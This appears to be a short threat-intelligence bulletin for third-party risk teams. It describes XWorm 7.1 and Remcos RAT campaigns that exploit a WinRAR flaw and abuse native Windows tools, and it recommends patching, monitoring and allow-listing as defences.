New XWorm 7.1 and Remcos RAT Campaigns Abuse Windows Tools to Evade Detection, Targeting Enterprise Endpoints
What Happened — Threat actors behind the XWorm 7.1 worm and the Remcos Remote Access Trojan have launched coordinated campaigns that leverage trusted Windows utilities (e.g., WinRAR, PowerShell, certutil) to bypass security controls. The malware exploits a known WinRAR vulnerability and employs process‑hollowing techniques to inject malicious code while remaining hidden from traditional AV/EDR solutions.
Why It Matters for TPRM —
- Legitimate Windows binaries are used as “living‑off‑the‑land” tools, making detection by signature‑based products difficult.
- Successful compromise can lead to long‑dwell espionage, data exfiltration, and lateral movement across a third‑party’s network.
- Vendors that rely on unmanaged Windows workstations become an indirect attack surface for their customers.
Who Is Affected — Any organization that uses Windows desktops or servers, especially those in Technology/SaaS, Financial Services, Healthcare, and Government sectors.
Recommended Actions —
- Verify that all WinRAR installations are patched to the latest version (addressing CVE‑2023‑40477).
- Harden endpoint detection by enabling behavior‑based monitoring for process‑hollowing and unusual use of native utilities.
- Enforce application allow‑listing or constrained language policies for PowerShell, certutil, and other trusted binaries.
- Conduct threat‑hunting exercises using known XWorm/Remcos IOCs and update SOC playbooks accordingly.
Technical Notes — The campaigns exploit a WinRAR archive‑handling flaw (CVE‑2023‑40477) to achieve initial code execution, then use process hollowing to inject the payload into legitimate processes. Abuse of native Windows tools (PowerShell, certutil, regsvr32) provides a “living‑off‑the‑land” approach that evades many static detection mechanisms. Source: HackRead